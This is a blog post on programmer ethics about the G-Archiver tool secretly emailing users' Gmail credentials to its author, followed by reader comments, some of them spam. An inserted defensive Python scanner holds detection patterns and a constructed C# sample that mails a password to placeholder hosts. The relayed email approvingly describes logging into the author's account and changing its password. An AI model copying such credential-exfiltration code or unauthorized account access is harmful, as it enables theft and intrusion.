March 7, 2008
From the ACM Code of Ethics:
As an ACM member I will
- Contribute to society and human well-being.
- Avoid harm to others.
- Be honest and trustworthy.
- Be fair and take action not to discriminate.
- Honor property rights including copyrights and patent.
- Give proper credit for intellectual property.
- Respect the privacy of others.
- Honor confidentiality.
It's hard to square that with the following hair-raising tale Dustin Brooks sent me via email:
I was looking for a way to back up my gmail account to a local drive. I've accumulated a mass of important information that I would rather not lose. During my search I came across G-Archiver, I figured what the heck I'll give it a try.
It didn't really have the functionality I was looking for, but being a programmer myself I used Reflector to take a peek at the source code. What I came across was quite shocking. John Terry, the apparent creator, hard coded his username and password to his gmail account in source code. All right, not the smartest thing in the world to do, but then I noticed that every time a user adds their account to the program to back up their data, it sends an email with their username and password to his personal email box! Having just entered my own information I became concerned.
I opened up a browser and logged in to gmail using his account information. It still worked.
Upon getting to the inbox I was greeted with 1,777 emails with account information for everyone who had ever used the software and right at the top was mine. I decided to go ahead and blast every email to the deleted folder and then empty it. I may have accidentally changed the password and security question to something I don't remember as well, whoops, my bad. I also contacted google to erase this account as I didn't see a way to delete it myself.
I generally try to give people the benefit of the doubt, but it's difficult to imagine any scenario where this isn't a completely malicious violation of people's trust. This is every user's greatest fear when giving out their login credentials, and to see it realized hurts the trust relationship between users and every other professional programmer working today. I've inadvertently posted my own login information to this very blog before. Fortunately for me, an eagle-eyed reader by the name of Israel Orange didn't abuse that information for his own gain, but instead kindly pointed out my error to me in a private email.
I certainly hope there are more programmers out there like Israel Orange than John Terry. Ethics matter for programmers, too.
Posted by Jeff Atwood
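The two things the email reports finding in the decompiled source, a credential hard-coded as string literals and user credentials being placed in an outgoing message, can be screened for mechanically. The following is an added example, not code from this post or from G-Archiver; the sample C# is constructed, and the assumption that the code under review uses the .NET NetworkCredential, MailMessage and SmtpClient classes is mine, not the page's.

```python
import re

STRING_LIT = re.compile(r'"(?:\\.|[^"\\])*"')
# Credential object constructed from two non-empty string literals.
HARDCODED_CRED = re.compile(r'new\s+NetworkCredential\s*\(\s*"[^"]+"\s*,\s*"[^"]+"')
# Assignment to a mail message's Body or Subject; group 1 is the expression.
MAIL_FIELD = re.compile(r'\.(?:Body|Subject)\s*\+?=(.*)')
# Identifier whose name suggests it holds a secret.
SECRET_NAME = re.compile(r'\b\w*(?:passw|pwd|secret)\w*\b', re.I)
MAIL_SEND = re.compile(r'\.Send(?:Async)?\s*\(')

# Constructed sample of decompiler output (all names and addresses are placeholders).
SAMPLE = '''\
public void AddAccount(string userName, string password)
{
    MailMessage message = new MailMessage();
    message.To.Add("author@example.com");
    message.Subject = "Password backup";
    message.Body = "Username: " + userName + " Password: " + password;
    SmtpClient client = new SmtpClient("smtp.example.com", 587);
    client.Credentials = new NetworkCredential("author@example.com", "PLACEHOLDER");
    client.Send(message);
}
'''

def audit_source(text):
    """Return (line_number, rule) findings, in line order, for decompiled C# text."""
    findings = []
    sends_mail = bool(MAIL_SEND.search(text))
    for no, line in enumerate(text.splitlines(), 1):
        if HARDCODED_CRED.search(line):
            findings.append((no, "hardcoded-credential"))
        m = MAIL_FIELD.search(line)
        if m and sends_mail:
            # Drop string literals so only identifiers are inspected;
            # a label such as "Password:" on its own is not a finding.
            expr = STRING_LIT.sub('""', m.group(1))
            if SECRET_NAME.search(expr):
                findings.append((no, "secret-in-outgoing-mail"))
    return findings

if __name__ == "__main__":
    for line_no, rule in audit_source(SAMPLE):
        print(f"line {line_no}: {rule}")
```

A hit is a prompt to read the surrounding code, not a verdict; obfuscated or indirect code will not match these patterns.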
I had a similar problem, some of the comments above really helped!
I suppose the classic examples of unethical programming are the guys from EDS who wrote the software for SAVAK, the Shah of Iran's secret police, in the 1970s.
You're an honest man, Jeff. Nice work.
Why have you linked to the original application? I think it can only have bad consequences, like improving their google rank, or lead people who aren't really paying attention over to their site where they may download it.
ethical - conforming to accepted standards of social or professional behavior.
Neither act was ethical.
Agree with A. Programmer above; copyrights and patent are not property rights, and there is no such thing as "intellectual property".
Will Hughes wrote:
How many people, do you think, are going to actually check that the
source and binaries match, or compile it themselves from source?
Open Source Software is not the answer to preventing this kind of abuse
Please think about what you're writing before you write it. The proper question is not "how many people will check?", but "how many people have to check in order to expose it?". The answer is "only one", just like it only took one person to figure out what this program was doing.
It's interesting that this software is back - with a new homepage too.
And they have this response to the scandal - http://www.garchiver.com/what-happened.htm
Wtf! Do they seriously think this is going to give them their credibility back? Or maybe there are more gullibles out there than I think.
What concerns me after reading all the information, is what are little guys like me supposed to do with all the "free software" that we find and make available for others on sites such as http://TheSoftwareNet.com ??
Is there any place, or anyone, that now checks software for malicious coding practices? Perhaps someone that checks them on request?
I, for one, would not want to knowingly pass on free software that would be detrimental to the person downloading and using.
I realize this is two years since original post, but perhaps someone will notice and respond.
Wow! That's awful. In the Internet marketing industry the ethics issue comes up when you create software to sell and need to decide whether to link to your own sites for SEO purposes. That can be argued either way--but what this guy did is unacceptable.
The other issue is how to protect software and protect download files and pages. Most people don't know their digital products get stolen easily.
Get the free special report: How Digital Thieves Are Stealing 43% of Your eBooks and Software Profits From Right Under Your Nose…and What You Can Do To Stop Them Dead In Their Tracks! here: Protect Software
Good thing you changed the password to the account. So is John Terry walking scot-free? I believe he has some explaining to do.
This is one reason that users should be entitled to examine the source code, or otherwise reverse engineer/analyse the workings of a piece of software, without fear of legal backlash.
Wow, what an arse.
It's shocking what people get up to and how some spend their time trying to do someone else over.
I have run all kinds of online businesses and one in particular is my Search Engines Business. This collects data using legal methods based on the people search industry.
This is all above board obviously but you would be horrified at some of the sites I have come across.
To answer Samrat Patil! No don't trust browsers. Our information is collected and used by google with the google chrome and google toolbar! Once installed you are being tracked.
Thanks for this great post!
I don't think that anything we post on the net is ever secretive, any decent programmer worth his weight in ale can hack a normal personal notebook or computer, it's just really sad. My blog http://bangkokcurtains.wordpress.com/ talks about some of this in Thai language, not in English though.
Is it true that hackers can really hack into any personal computer if they truly wanted to? Assuming they don't have a personal code of ethics? I have heard about how hackers have hacked into bank accounts to manipulate classified data and confidential information, where do they learn this stuff? NOT that I am interested in learning them, but seriously, with most of everyday financial transactions taking place online, it is truly a nightmare.
I wrote an essay in Thai about hackers in http://bkkcurtain.wordpress.com/ if anybody is interested, the English version is only about curtains, but the Thai version contains all sorts of information about all kinds of topics. Programmers in Thailand are pretty good as well, and this is why I never conduct money transactions online.